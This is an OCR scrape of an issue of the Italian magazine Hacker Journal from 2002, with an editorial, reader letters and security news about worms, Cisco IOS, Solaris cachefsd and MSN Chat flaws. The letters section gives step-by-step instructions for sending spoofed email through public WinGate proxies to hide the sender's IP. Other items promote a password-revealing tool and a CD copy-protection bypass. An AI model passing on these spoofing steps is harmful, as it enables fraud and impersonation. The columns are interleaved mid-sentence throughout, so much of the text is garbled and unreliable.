Sei sulla pagina 1di 29

hack.

er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi 2€ CITÀ
di programmazione e come espandere
le loro capacità, a differenza di molti utenti, che preferiscono NOOPINUFBOBRLMIAZIONI
SOL OLI
imparare solamente il minimo necessario.” E ARTIC

il botto
Il primo numero passerà alla storia per
molte cose, alcune divertenti, altre meno. Per
quanto mi riguarda ho sorriso a una lettera
che ci chideva se con “tutti ‘sti teschi siamo
un’agenzia di necrofori o facciamo giorna-
li...”. Buona la seconda, anche se tutto som-
(fra schiaffi e applausi)
mato l’idea del necroforo non è da scartare a
priori. In realtà il teschio è evidentemente una
provocazione che punta a solleticare le corde
hacker journal 2 is out!

E
dell’ironia. Qualcuno è stato al gioco, qualche due; con più calma, passa- che ci ha gratificato. Più tecnica, dunque, più ap-
altro si è risentito, forse non cogliendo la vena ta la sbornia del primo im- profondimenti. Abbiamo forse peccato di ingenui-
ironica. Intendiamoci: noi vogliamo fare un patto, siamo qui a leggere il tà: non ci aspettavamo una reazione così netta e
giornale serio, con contenuti attendibili ma secondo numero del nostro decisa da parte della rete. Forum, guestbooks e
vogliamo anche, concedetecelo, divertirci un giornale. Di cose ne sono canali di chat sono letteralmente esplosi. E come
po’. Altrimenti andavamo a lavorare in ban- successe tante, e altre ne succederanno: un mer- avevamo intuito, la parola "hacker", è stata presa
ca... Poi, come accade in un disco, voglio rin- coledì mattina mi sono alzato, ho acceso il PC, e di mira e divenuta nodo di equivoci e litigate. Ma
graziare chi ci ha dato una mano: Bismark, mi è bastato dare un'occhiata alla posta e a qual- dare una mescolata alle carte, creare movimento,
Onda Quadra, SecurityInfos e tutto il panora- che sito per rendermi conto che, con tutta proba- passa anche per decisioni azzardate. Abbiamo tra
ma underground in generale: grazie di cuore. bilità, avevamo "fatto il botto". Con tutto ciò che le mani uno strumento di enorme potenzialità:
Ah, dimenticavo, questo è comunque un otti- comporta, è chiaro: non sono esperto di editoria, raggiungere tante persone con un mezzo carta-
mo “disco” da gustare fino un fondo... ma conosco il web e le sue manie, la sua efficacia ceo, così differente da quello digitale, è un’espe-
bomber78@hackerjournal.it e la sua velocità. Essere la prima rivista italiana a rienza esaltante ma piena di responsabilità. Mol-
trattare certi argomenti si portava dentro la pro- ti, anche tra coloro che lavorano/smanettano da
HJ: intasate le nostre caselle messa di polemiche, reazioni e affanni da parte di anni, hanno criticato non tanto i contenuti, quan-
Ormai sapete dove e come trovarci, appena una comunità che per sua natura è attenta ed esi- to l'immagine e la "facciata": opinioni che nasco-
possiamo rispondiamo a tutti, anche a quelli gente, pronta a dire la sua, e ci tiene a che la pro- no da chi ha già esperienza e conosce a menadi-
incazzati. Parola di hackers. SCRIVETE!!! pria voce sia ascoltata dagli altri. Era chiaro che to tutta la terminologia del settore. Proporsi in edi-
Anno 1 – N. 2 luglio 2002 sarebbero arrivati fischi e applausi: ma se abbia- cola anziché su un sito impone stravolgimenti nel
Boss: theguilty@hackerjournal.it mo deciso di giocare comunque questa partita è linguaggio: se si vuole fare divulgazione è neces-
a cura di Servizi Editoriali perché siamo convinti che ne valga la pena. Cer- sario usare parole che anche chi non bazzica abi-
Director: rayuela@hackerjournal.it
Editor: bomber78@hackerjournal.it to, alle baggianate e alle stupidità gratuite non si tualmente su packetstormsecurity può recepire. Al-
Technical editor: caruso_cavallo@hackerjournal.it farà mai il callo, ma tant'è: /dev/null. A tutti quel- trimenti si fa qualcosa a uso e consumo di chi già
Graphic designer: gfag8@hackerjournal.it
Contributors: cronopio@hackerjournal.it (images), li che invece ci hanno mosso critiche civili, anche è smaliziato e dentro l'ambiente, e che certamen-
Jacopo Bruno (cover picture), Daniele Festa pesanti e incazzate, ma costruttive, un enorme rin- te non ha bisogno di Hacker Journal. Per tutti gli
Publisher graziamento. Perchè se già da questo numero ab- altri, i curiosi, quelli che sono coscienti di avere an-
4ever S.r.l.
Via Torino, 51 biamo migliorato, è anche grazie a chi ci ha som- cora da imparare, cercheremo di affrontare argo-
20063 Cernusco sul Naviglio merso di messaggi, email e telefonate. La richie- menti via via più specifici e tecnici. Come sta scrit-
Fax +39/02.92.43.22.35
sta principale? Maggior specificità tecnica e credo to sui cartelli delle autostrade: stiamo lavorando
Printing
Stige (Torino) che siamo sulla buona strada. E anche qui un per voi. Con HJ vogliamo colmare un buco: of-
Distributore enorme aiuto lo ha dato la comunità, intasando frire un appoggio a chi si interessa di questi ar-
Parrini & C. S.PA. - 00187 Roma - Piazza le nostre caselle con idee, articoli e suggerimenti gomenti, soddisfare la curiosità di chi si avvicina
Colonna, 361- Tel. 06.69514.1 r.a./20134
Milano, via Cavriana, 14 - Tel. preziosi. Abbiamo ottenuto la collaborazione di per la prima volta al mondo underground. Non
02.754117.1 r.a. personaggi importanti del panorama under- ci interessano le lezioni morali; manifesti e “re-
Pubblicazione quattordicinale registrata ground, così come di gruppi di appassionati e di gole per essere un hacker” le lasciamo a chi ha
al Tribunale di Milano il 25/03/02
con il numero 190. singoli che hanno deciso che questa cosa può voglia di dedicarsi a politica e filosofia, noi vo-
Direttore responsabile: Luca Sprea avere un suo senso e una sua utilità: questo, più gliamo solo appassionare... A sentirci gente!
Gli articoli contenuti in Hacker Journal dei complimenti che abbiamo ricevuto, è stato ciò caruso_cavallo@hackerjournal.it - ICQ n° 66876309
hanno uno scopo prettamente didattico
e divulgativo. L’editore declina ogni
responsabilità circa l’uso improprio
delle “tecniche” e dei tutorial UN GIORNALE PER TUTTI
che vengono descritti al suo interno.

L’invio di immagini ne autorizza


implicitamente la pubblicazione gratuita
su qualsiasi pubblicazione anche non
della 4ever S.r.l.
Copyright 4ever S.r.l.
Testi, fotografie e disegni, Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hacking non è invece per nul-
pubblicazione anche parziale vietata.
Realizzato con la collaborazione di la facile: ci sono curiosi, lettori alle prime armi (si fa per dire) e smanettoni per i quali il computer non
Hacker News Magazine - Groupe Hagal Aria ha segreti. Ogni articolo di Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-
mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi mangia pane e worm).

2 | www.hackerjournal.it
THE DAY AFTER IL PROSSIMO
NUMERO IN EDICOLA
i commenti “del giorno dopo...”
IL 20 GIUGNO:
OGNI 14 GIORNI
IL GIOVEDì
Ora comincia la sfida
Gymnasium la palestra di mente a tutti, specie al-
HJ: la “raccolta delle fir-
me” per allestire il vostro
l’amministratore dele-
gato (nella foto), quindi
HackMeeting
server/palestra è andata stiamo provvedendo ad TESCHI SÌ... 21.22.23 Giugno
al di là di ogni più rosea allestirlo in tempi brevi “Ragazzi la cover
aspettativa. per permettervi è davvero forte 2002 Bologna

Q
Il progetto pia- di sperimen- continuate così...”
ce pratica- tare... “C***o bello!
TPO - via Lenin 3, Bologna
Mettetene altri
uesta è la quinta edizione dell'hackmee-
arredano la ting italiano. Come le precedenti anche
cameretta da D**” quest'anno l'incontro si svolge in un
luogo autogestito, il Teatro Polivalente Oc-
cupato (TPO www.ecn.org/tpo) di Bologna.
O NO? E, come i precedenti, anche questo meeting è to-
“Cos’è talmente autogestito e autofinanziato. Non ci so-
una no né sponsor, né etichette.L'intera organizza-
rivista zione tecnico logistica viene portata avanti
durante l'anno da un collettivo virtuale
Entrate e firmate, please di necrofori?”
“Vanno bene per i che si ritrova nella mailing listhack-
ragazzini di 13 anni meeting@kyuzz.org.
forse neanche per
loro... “Bella caz***a”

Occhio! Io sono un ex. un ex hacker.


Alla url del nostro Quando (12-14 anni fa circa) non
Il sito è di nuovo on-line, più bello di sito: http://www. esistevano leggi a riguardo, non
hackerjournal.it/
prima e ricco di tante cosette simpati- esisteva Internet (per come la si
secretzone c’è
che. Vi inviatamo a frequentare la
una sezione per i conosce oggi) e si "navigava" solo via Ita-
Chat che è molto affollata in questo lettori di HJ, biso- Pack, FidoNet (esiste ancora oggi!!!), la rete
periodo e la pagina dei Tutorial, sem- gna autenticarsi: VideoTel e tante BBS. Quando chi aveva un
pre più gettonata, che sta crescendo USRobotics a 9.600 bps o dopo qualche an-
anche grazie ai vostri contributi. Na- user: no a 14.400 con vari sistemi di compressione
vigatelo senza risparmiarvi e non sw7x& che lo portavano a più alte velocità era un
mancate di segnare il Book...
password: Lord! Allora (nel senso di a quell'epoca) lo
whj02 spirito era molto diverso. Si stava notti inte-
re a cercare qualche backdoor di un sistema,
si provavano NUI e NUA in ItaPack e si bo-
Un sito per me molto bello bello è: Complimenti complimenti complimenti xava (la serie di Blue, Red e Black box che
www.cracks.am http://www.cracks.am complimenti complimenti complimenti generavano toni a multifrequenza per atti-
fbi37 cOre vare linee telefoniche). Io sono stato consu-
lente per le forze dell'ordine italiane e stra-
Sono il fondatore di UnixRemote niere, per reati informatici. Cose di un livello
Lab (www.unix.remotelab.org), un labora- Noi hemm.. avremmo in lavora- particolare, comunque! O dove l'uso dei
torio virtuale dedicato al mondo Unix. Al zione un sito che tratta hacking mezzi informatici diventa passaggio di infor-
momento è disponibile un documento che inteso come sicurezza dei siste- mazioni sulla pedofilia o cose che chiunque
introduce Unix. (http://www.unix.remote- mi, programmi open source, tutorial e ar- con un po' di buon senso eliminerebbe.
lab.org/unix/introduzione-unix/) ticoli tutti scritti dalla nostra redazione. Quindi dite ai vostri lettori: Divertitevi, impa-
Se volete aggiungere tra i vostri link il rate, spaccate il culo al mondo, ma state at-
http://www.hackernet. dalweb.it UN OTTI- nostro sito questo è l'indirizzo: tenti a non mettervi nei guai, e spiegate lo-
MO SITO. INSERITELO TRA I VOSTRI LINK http://www.hackeralliance.net ro che voi non siete hacker (non avreste mai
Net net [JARRET] fatto questa rivista), ma che la rivista può es-
sere un mezzo per molti per conoscere i con-
...Ero solito litigare più con Windows cetti e crescere assieme.
Propongo un livello di difficoltà che con la mia ragazza, ma da Ciao, buon divertimento, e mi raccomando.
per gli articoli tipo libri di cucina quando uso Linux lei ha riconquista- Oggi fare danni è tanto facile...
to il titolo... Roberto Capodieci

3 | www.hackerjournal.it
INONDATI DA E-MAIL: www.hackerjournal.it

CREW: ISTRUZIONI PER L’USO


Ciao belli, complimenti per la rivista.
Va bene!
Devo confessarvi che sono un neofita e Due pagine di mail, ce ne sarebbero
non me ne vergogno affatto. Proprio volute venti. Beh, gli insulti non
per questo volevo farvi una domanda mancaco, ma l’uomo, quello vero, ha
che forse è un po’ imbarazzante tutti bisogno anche di insulti e pesciate
quelli che smanettano dalla mattina al- in faccia, e il redattore pure...
la sera. Che c***o sono ‘ste crew di cui Diciamo (stesso intercalare)
si parla nel giornale? che lo fortifica. E qui ad HJ siamo
Armageddon redattori strong, scriviamo su
una tastiera da fachiro con
La traduzione dall’inglese è “equipag- delle puntine rovesciate al posto
gio” o, forse, piuttosto una “ciurma” se dei tasti. Perché siamo uomini veri.
vogliamo rimanere in ambito piratesco. Diciamocelo...
In pratica si tratta di gruppi di users che E a parte questo, adesso basta
decidono di radunare forze e conoscen- parlare di noi, c’è la Rete che ci
ze per crescere sia come singoli che co- aspetta, vediamo che cosa siete
me comunità. Cosa fanno le Crew? Beh capaci di fare.
dipende dalle finalità che le ispirano. Ci
sono Crew assolutamente storiche e di
fama riconosciuta che operano soprat- POSTA ANONIMA fare tutto con calma, la miglior cosa
tutto sul fronte della sicurezza in tutte le da fare è prepararsi già prima il do-
sue sfaccettature, analizzando problemi Volevo sapere come inviare la posta na- cumento e poi procedere con
e proponendo soluzioni. Altre sono più scondendo il mio indirizzo IP. copia/incolla. K
votate ad obiettivi di tipo “militare” at- Lucifer
taccando magari canali nella rete per CORSO + PALESTRA
ottenere prestigio e farsi pubblicità. Al- L’argomento è molto più esteso e com-
cune Crew sono strutturate con un gerar- plesso di quello che possa sembrare. Si Ma se l'hacker deve saper programma-
chia di tipo militare con reclute (il livello può scegliere un sito che consente di re, scusate, ALMENO UN CORSO SU C E
più basso) e gradi via, via superiori. K nascondere l’IP come punto di invio C++ lo trovo necessario, forse xchè io
della e-mail, come descritto all’interno nn ne so un ca**o né di hacking né di
del giornale, oppure uno dei metodi programmazione?
DOLCI “BISCOTTINI” più spiccioli è usare un wingate, ovve- Cmq penso che la rivista dovrebbe
ro un proxy per il telnet che come tutti i contribuire alla realizzazione del sogno
Leggo di Cookies che si installano sul PC proxy fa comparire nei log del sistema dei molti profani che la comprano, DI-
ad insaputa dell’utente, vorrei sapere a cui ci connettiamo il suo ip invece del VENTARE HACKER, quindi propongo ol-
cosa sono e come eliminarli. Tank nostro. tre ad una sezione sulla programma-
Ludus La prima mossa è di cercare una li- zione un ampliamento di quella della
sta di wingate pubblici, quindi l'opera- pratica (magari un po' a scapito delle
Un Cookie, o “biscottino” è un archivio zione successiva consiste nel connetter- pesanti news), però nel complesso è un
trasmesso ad un web browser da un si in telnet ad uno di questi.L'output del ottima idea, in conclusione vi PREGO di
web server che è usato per registrare le wingate sarà di questo tipo: WinGate>. metterci a disposizione al + presto
sue attività su un Web site. Per esempio, Subito dopo questo prompt dovete GYMNASIUM il "SERVER/ PALESTRA".
quando comprate gli articoli da un luo- scrivere l'indirizzo del server di posta e Grazie
go e li disponete in un cosiddetto car- la porta, come riportato qui sotto: Win- Etiope
rello di shopping virtuale, quelle infor- Gate>mail.tin.it 25.
mazioni sono memorizzate nel Cookies. Lui si connetterà al server lasciando Per la palestra ci stiamo organizzando,
Quando il browser chiede gli archivi il suo ip al posto del nostro; a questo l’idea piace anche a noi parecchio.
supplementari, le informazioni del “bi- punto basta seguire le indicazioni pre- L’argomento programmazione lo fac-
scotto” sono trasmesse di nuovo al ser- cedenti e spedire una semplice fake- ciamo nostro, cercheremo di acconten-
ver. I biscotti possono ricordarsi di altri mail. tare te e altri lettori che in effetti ci
generi di informazioni personali come la Unico problema potrebbe essere il hanno chiesto la stessa cosa. K
vostra parola d'accesso. Per gli utenti di non vedere l'output su schermo delle
Windows i biscottini si trovano nel file operazioni che facciamo; alcune volte UN PO’ DIFFICILE…
cookies.txt all’interno del browser di na- infatti succede che noi usiamo tranquil-
vigazione, basta eliminarlo di volta in lamente il wingate ma appena ci con- Ciao Raga, ho trovato la rivista mol-
volta. Gli utenti del Mac possono trovar- nettiamo da lì sul server smtp non ri- to interessante, ma come primo nu-
li seguendo il percorso: preferenze>ri- usciamo a leggere ciò che noi scrivia- mero ritengo che sia veramente
cezioniarchivi>cookie del browser, ba- mo, mentre vediamo tranquillamente le complessa, si va bene per chi ha già
sta evidenziarli e cancellarli. K risposte del server, in questi casi basta esperienza nel campo ma per chi è

6 | www.hackerjournal.it
la prima volta che si avvicina dovre-
ste essere più chiari, insomma fare
una rivista che possa essere letta an-
che da chi di informatica e pirateria
non ne capisce granché.
Cmq complimenti avete creato
qualcosa di serio spero che la prossi-
ma uscita ci sia anche un Cd-rom al-
legato come giuda... ciao a presto
Maudit 56

Ti daremo l’e-mail di “Etiope” così vi


mettete d’accordo. K

LAVORI FORZATI
Complimenti 300 anni di questa attivi-
tà... cIàùZ
maximus

300 anni di lavoro? È una minaccia? K


hacker, presa dal Jargon (il Dizionario http://www.tuxedo.org/~esr/jar-
della Rete, reperibile a http://www.tu- gon/html/entry/hacker.html
PROGETTO XOOPS.6B6 xedo.org/~esr/jargon/). Hacker viene - La Electronic Frontier Foundation,
definito come chi "ama esplorare i det- organizzazione che da sempre difen-
Sono alex da Vicenza volevo segna- tagli di un sistema riprogrammabile e de i diritti dei cittadini in rete e la lo-
larvi il mio ultimo progetto cerca di estenderne al massimo le pos- ro privacy: http://www.eff.org
www.xoops.6b6.net che tratta di un sibilità". - La GNU, movimento principale
programma Opensource che permette Vi sono anche altre definizioni che dell'Open Source, organizzazione alla
con pochi passaggi di creare un por- lo intendono come "un esperto o entu- base di molti fra i migliori (e gratuiti)
tale. siasta di qualsiasi cosa", o come "chi software in circolazione:
Penso che la cosa possa interessa- apprezza le sfide mentali nel superare http://www.gnu.org
re ai vostri lettori. Aspetto i vostri o aggirare creativamente barriere". Per quanto riguarda l'Italia, vorrei
commenti. A presto L'ultima definizione, quella di "un segnalare l'Associazione Culturale Te-
Alex individuo che cerca di scoprire infor- lematica Metro Olografix:
mazioni riservate" e` riferita al termi- http://www.olografix.org
E noi aspettiamo quelli dei lettori che ne "cracker"… - un altro link "chiave" della sicu-
sicuramente non mancheranno di te- Questi sono siti e libri sui quali e` rezza italiana e` la mailing list
stare il programma. K possibile ritrovare alcune delle idee www.sikurezza.org, http://www.siku-
presenti in queste mie scarne righe. Ce rezza.org
HACKERS, STORIE DI DISIN- ne sarebbero un'infinita`, probabil- I libri che considero migliori sono:
FORMAZIONE QUOTIDIANA mente molto migliori. Questi sono - Hackers - gli eroi della rivoluzio-
quelli che più mi hanno ispirato. In- ne ("Hackers"), di Steven Levy.
Ognuno ha la sua versione dei fatti e nanzitutto Jargon, il dizionario della - Giro di vite contro gli hackers
le proprie opinioni su questo scottan- Rete, con la sua precisa definizione di ("The Hacker Crackdown"), di Bruce
te argomento, gli "hackers". Io vorrei Hacker, di Etica Hacker e altri succu- Sterling.
partire dalla definizione ufficiale di lenti argomenti: - Spaghetti Hacker, di Stefano
Chiccarelli e Andrea Monti
(www.spaghettihacker.it)
BETA O PROGRAMMI? Lorenzo a.k.a. Kipple

Sono un po’ perplesso sempre più In effetti molte società di software han- Accidenti, Lorenzo, le “scarne righe”
spesso si trovano sul mercato pro- no la cattiva abitudine di lanciare pro- come le definisci tu, bastavano da
grammi che a poche settimane dal dotti ancora poco testati. Lo fanno per sole a riempire tutto lo spazio della
lancio necessitano di patch e contro- rispettare le scadenze di mercato e per posta. Ci siamo limitati a riportare le
patch. uscire in contemporanea con la campa- cose salienti soprattutto per i lettori.
Ma dico io: non potrebbero testarli un gna pubblicitaria di lancio pianificata Adesso giriamo tutto questo agli altri e
po’ meglio prima di metterli in vendi- molto tempo prima. Risultato? E’ sotto vediamo che ne pensano. Scrivi anco-
ta, a volte sembra di avere a che fare gli occhi di tutti: programmi e videogio- ra, e, per te come per tutti gli altri, di-
con della vere e proprie beta. chi sono sempre più spesso instabili e venta un nostro collaboratore: uno per
Lexus necessitano di interventi postumi. K tutti, tutti x hacking. K

www.hackerjournal.it |7
news
HOT! ! RILASCIATA STEPHANIE PER OPENBSD 3.1

openbsd box con shell accounts per molti


users l’impiego è sicuramente “una bella mos-
sa” a tutti gli effetti.
La nuova versione è facilmente e liberamente
configurabile.
In virtù di ciò è quindi possibile utilizzare le so-
le funzionalità che ci interessano tralasciando
quelle che vengono proposte nel pacchetto e
che non fanno al caso nostro o che comunque
! UN VIRUS non sono indispensabili per la configurazione
tephanie è una serie di scripts per l'harde- che dobbiamo gestire.
TRAVESTITO DA FIX Sning di una openbsd box. Stephaine può essere reperita in tutta tranquil-
molti sarà capitato di ricevere una e-mail con Le patches per OpenBSD contenute in Stepha- lità in rete. E’ disponibile all’indirizzo internet:
Amittente Kaspersky Labs in cui viene propo- nie hanno lo scopo di aumentare la sicurezza e http://www.innu.org/~brian/Stepha-
sto un fix per risolvere in modo definitivo e an- la stabilità. Il suo utilizzo non è consigliato pro- nie/.
nientare il worm di Klex. prio per tutti gli utenti, ma se si ha una Da cui può essere liberamente scaricata. K
La e-mail è identificabile perché contiene il se-
guente soggetto: You're under a serious threat!.
Il contagio avviene attraverso un collegamento ! DOCUMENTO SULLA CONFIGURAZIONE
ad un server remoto dove viene scaricato ad in- DI LINUX IN SICUREZZA
saputa dell’utente ignaro il Trojan horse "Smo-
kedown" da un server remoto per poi installarlo
sul PC. Il Trojan sfrutta una vulnerabilità di Inter- dal titolo Linux Security Configuration Document.
net Explorer che peraltro era già stata segnalata La notizia farà sicuramente felici i seguagi del
dalla stessa Maicrosoft qualche tempo fa e di pingunino che sembrano essere sempre più nu-
cui si trovano tutte le specifiche all’indirizzo: merosi e che anche al nostro indirizzo di redazio-
http://www.microsoft.com/technet/s ne si fanno sentire.
ecurity/bulletin/MS01-020.asp. Nel- Del resto uno dei “probemi” di Linux è proprio la
l’immagine abbiamo “taroccato” M. Technet :). sicurezza delle migliaia di versioni circolanti, al-
La patch che permette di sanare questo proble- cune meno affidabili di altre.
ma si può scaricare liberamente dal sito: Il documento è reperibile presso il seguente in-
http://www.microsoft.com/win- dirizzo:
stato reso disponibile un documento sulla
È configurazione di Linux in completa sicurezza
dows/ie/downloads/critical/q29010 http://www.intersectalliance.com/proj-
8/default.asp. K ects/LinuxConfig/index.html. K

! HEAP OVERFLOW ! VULNERABILITÀ CISCO SYSTEM IOS


IN CACHEFSD
l demone cachefsd della Sun è installato di de-
Ifault sui Sun Solaris 2.5.1, 2.6, 7 e 8 (sia SPARC stata riscontrata una vulnerabilità nel si- Tra i sistemi che non sono toccati dalla falla si
che Intel). Esiste una vulnerabilità in cachefsd che È stema operativo CISCO. segnalano invece:
permette a un utente di eseguire codice arbitrario Cisco IOS sarebbe affetto da una falla che ne
con i privilegi di cachefsd, che di solito sono root. causerebbe un Dos in seguito all'accettazione Sistemi non vulnerabili:
Sono state rilasciate patch per risolvere questo di particolari pacchetti ICMP. Cisco 1603 IOS 12.1 (11)
problema. Per trovare la patch adeguata al vostro La falla in questione interessa una serie piut- Cisco 1603 IOS 12.2 (5)
sistema consultate l'advisory sul sito del CERT al- tosto diffusa di sistemi che riportiamo di se- Cisco 2503 IOS 11.2 (26a)
l'indirizzo http://www.cert.org/adviso- guito. Cisco 2503 IOS 11.3 (11b)
ries/CA-2002-11.html. K Cisco 2503 IOS 12.0 (19)
Sistemi Vulnerabili:
Cisco 1005 IOS 11.0 (18) Soluzione:
Cisco 1603 IOS 11.3 (11b) Cisco ha rilasciato una soluzione momentanea
Cisco 1603 IOS 12.0 (3) nel frattempo che esca la patch: per gli utenti
Cisco 2503 IOS 11.0 (22a) che hanno Cisco IOS 11.x bloccare tutti gli ICMP
Cisco 2503 IOS 11.1 (24a) redirect destinati al router. K

“UN ESPERTO È UNA PERSONA CHE EVITANDO TUTTI


I PICCOLI ERRORI PUNTA DRITTO ALLA CATASTROFE”.
> Definizione di Weinberg

8 | www.hackerjournal.it
news

! GABOLINA PER CONOSCERE LA POTENZA REALE


DEL VOSTRO MAC! HOT!
l nuovo System X del Mac Mac. Quindi confrontan-
I consente di conoscere il bench- do i processi di elaborazione
mark della macchina su cui è mon- tra computer diversi se ne indivi-
tato con un semplice comando te- dua anche la differenza in termini di
stuale eseguito dal terminal di Darwin, potenza il tutto in modo intuitivo sen-
la struttura tutta Unix del nuovo sistema za errori.
operativo Macintosh. Per possedesse ancora il System clas-
Il comando da digitare è: openssl speed. A sic, la possibilità di conoscere le pre-
questo punto Darwin elaborerà una serie stazioni è confinata all’opzione Apple
di dati che corrispondono al tempo che System Profiler attivabile diretta-
il sistema impiega per criptare in SSL mente dal menu “mela” e in grado
dei pacchetti dati. di dare tutte le specifiche tecni-
Minore è il tempo impiegato per che. Assolutamente indispen-
l'elaborazione dei dati, mag- sabile se si acquista un
giore è la potenzialità del Mac usato... K ! MICROSOFT CHAT
È VULNERABILE...
! SHOWPASSWORD PER “RECUPERARE” MA DAI!
l CERT (Centro di coordinamento per la si-
LA PASSWORD I curezza su Internet) ha rilevato una falla
preoccupante in Microsoft MSN Chat.
un simpatico programmino che pesa soltanto Si tratta di un buffer overflow che è contenu-
È 216 kb che sostituisce gli asterischi nei cam- to all'interno di un parametro di "ResDLL" resi-
pi password con la password in chiaro. dente in un controllo ActiveX.
Questo è molto utile (per esempio) se vi dimenti- Il problema grosso di questo controllo è che
cate la password della posta elettronica, ma l'a- contiene la firma di Microsoft. Questo per-
vete registrata in Outlook o in qualsiasi altro pro- mette al browser (sempre che si stia utilizzan-
gramma che la rivela con gli asterischi. do Internet Explorer) di scaricare il controllo in
Ovviamente cercate di utilizzare questo program- questo modo anche gli utenti di Internet Ex-
ma con scopi LEGALI!!! plorer possono risultare affetti da questa vul-
Si può scaricare liberamente dal sito: nerabilità.
http://ph14.virtualave.net/show- Questa vulnerabilità può consentire a fre-
pass.zip. K quentatori della rete malintenzionati di ese-
guire del codice arbitrario utilizzando i privile-
gi dell'utente che sta utilizzando il Messen-
! MELISSA: 20 MESI DI CARCERE AL SUO AUTORE ger. Microsoft ha rilasciato un bollettino in
cui spiega i problemi di questa vulnerabilità.
Si tratta del Microsoft Security Bulletin
niente da un amico, o comunque da una per- MS02-022 che è possibile trovare a questo
sona in possesso dell’indirizzo e-mail. Una vol- indirizzo: http://www.microsoft.com/tec
ta ricevuto il messaggio contenente Melissa, hnet/security/bulletin/MS02-022.asp
il Pc vittima inviava altri 50 messaggi infetta- Il controllo in questione non viene installato
ti ad altrettanti PC. di default su nessun sistema di Instant Mes-
Gli effetti del virus erano rappresentati da un saging ma va scaricato e installato per vo-
inspiegabile rallentamento di sistema. lontà dell'utente.
Il suo autore David L. Smith, 33 anni, è stato Questo dovrebbe garantire una maggiore si-
condannato a 20 mesi di reclusione e una curezza. Allo stesso indirizzo del bolletino Mi-
multa di circa 5.500 euro. Smith è da consi- crosoft è possibile scaricare la patch in gra-
derarsi la prima persona condannata per aver do di risolvere il problema.
diffuso un Virus informatico. Il consiglio e comunque di installare imme-
olti si ricorderanno del Virus Melissa che Da considerare che Melissa di per sé non ha diatamente la patch per sanare la vulnerabi-
M qualche tempo fa si diffuse in rete ad una mai intaccato o cancellato componenti di si- lità, perché se il rischio è relativamente bas-
velocità impressionante. stema dei PC in cui si è propagato, né file di so per i sistemi Internet e Intranet, finisce
Infatti una prerogativa di Melissa era proprio programmi. per essere critico per i sistemi client che
la rapidità di propagazione. Il contagio avveni- Tuttavia si stima che il danno arrecato dalla hanno una grandissima diffusione e che fini-
va attraverso una e-mail che riportava come sua diffusione sia stato di circa 90 milioni scono per interessare un gran numero di
oggetto un “messaggio importante” prove- di Euro! K utenti. K

www.hackerjournal.it |9
news
HOT! ! VERMICELLO “PORCELLO”

me un vero e proprio Ca-


! XBOX: EMULATORE vallo di Troia che porta al
DIABOLICO suo interno un file che
sostituisce la firma nei
evono stare attenti gli appassionati di X- messaggi che l’utente,
D Box, che smaniano dalla voglia di giocare infettato, spedisce suc-
i games della piattaforma Microsoft su PC at- cessivamente usando
traverso l’uso di un emulatore. Outlook Express.
Infatti attualmente in rete è disponibile pro- Quindi una volta insedia-
prio un emulatore di X-Box. tosi nel PC il worm in
Si tratta in realtà di un Trojan Horse destinato questione è capace di
ad arricchire i relativi autori per mezzo del propagarsi all’infinito an-
“pag-per-scatto” ed altri schemi di pubblicità dando a colpire tutte le
on-line di questo tipo. persone comprese in un
Il programma "EMU_xbox.exe", una volta elenco di indirizzi.
installato non consente di giocare ma produce Una volta che si è instal-
soltanto messaggi di errore. lato nel sistema, Fort-
Un realtà lo scopo è quello di installare sul “PC night cambia le prefe-
vittima” un portello posteriore NetBUIE.exe, renze dei browser di na-
che tenta silenziosamente di mettersi in con- vigazione impostando
tatto con i numerosi server a distanza della re- come pagina iniziale di
te di pubblicità in linea DoubleClick, almeno navigazione: rowto-
secondo un'analisi preliminare proveniente da cash.net e altri siti col-
TruSecure Corporation. legati, siti a luci rosse
Il programma fraudolento sembra dissipare il ella costellazione dei Worms, tanto varie- dalle cui pagine viene sparato il worm vero
relativo nome da NetBEUI, che è ortografato N gata e simpatica, se ne segnala uno del e proprio.
diversamente e corrisponde all'interfaccia di tutto nuovo, non particolarmente dannoso e Il comportamento non è dissimile a quello di altri
utente aumentata NetBios, a un protocollo di che sta raggiungendo, cosa a dire il vero que- artifizi che hanno come scopo quello di condurre
rete standard di Windows. sto è l’aspetto più preoccupante, discreti livelli l’utenza su siti di chiaro contenuto pornografico a
In uno sforzo ulteriore di impedire agli uten- di diffusione. tutto vantaggio degli amministratori in cerca di
ti infettati di rilevare o di disinstallare il por- Si chiama JS.Fortnight, la cosa più interessante profitti conitnui. Per penetrare all’initerno del PC
tello posteriore, gli autori di NetBUIE.exe e rilevante è il suo meccanismo di azione, il mo- il worm sfrutta una vulnerabilità di Microsoft
hanno dato agli attributi dell'archivio del pro- do in cui si insinua nel computer vittima porten- VM Active X, una falla di cui non soffrono i si-
gramma un’aria di legittimità. do il suo carico infetto. Fortnight si comporta co- stemi Microsoft pacchati. K
Infatti il programma mostra un avviso di
copyright di Microsoft ed è descritto come
"programma di utilità di verifica del collega- ! “COPIARE” I CD CON UN PENNARELLO
mento di rete."
NetBUIE.exe non è il primo emulatore bo-
gus per colpire in Internet. on si tratta di disegnare, copiandolo, un bel ne dei bordi del disco, è possibile aggirare la
In gennaio, un altro emulatore di Xbox fasul- N CD, ma di usare il pennarello per aggirare le protezione e rendere i CD protetti perfettamen-
lo, Emulator.0.35.zip", era stato lanciato protezioni introdotte dalle case discografiche te leggibili da qualsiasi lettore di CD-ROM.
in rete. quali Cactus Data Shield di Midbar e la Key2Au- Questo avverrebbe perché la linea di pennarello o
L’indirizzo dove potete trovare l’emulatore è: dio di Sony. il post-it fanno in modo che il lettore ignori la trac-
http://www.emulator-zone.com. K Il tutto viene spiegato per filo e per segno nel si- cia dati più esterna trattando in questo modo il di-
to della ezine tedesca sco come un normale CD audio. K
Chip.de. Le due protezioni citate aggiungono al
Se “lesionate” il vostro CD preferito non prendeteve-
Cd una traccia esterna che viene ignorata dai la con noi: è un trucco made in Germany.
lettori audio, meno sensibili, ma manda in tilt i
lettori CD-ROM dei Computer.
Chip.de ha minuziosamente documentato all’in-
dirizzo http://www.chip.de/praxis_wis-
sen/praxis_wissen_8725919.html.
Come coprendo con un post-it la zona compre-
sa fra la linea di divisione che separa le tracce
audio (sul lato interno) da quella dati oppure
tracciando con un pennarello dalla punta sottile
una linea tangente alla linea divisoria in direzio-

10 | www.hackerjournal.it
news

! VULNERABILITÀ LINUX NETFILTER FIREWALL


HOT!
stata riscontrata una vulnerabilità in Linux
È Netfilter Firewall, in cui un remote user po-
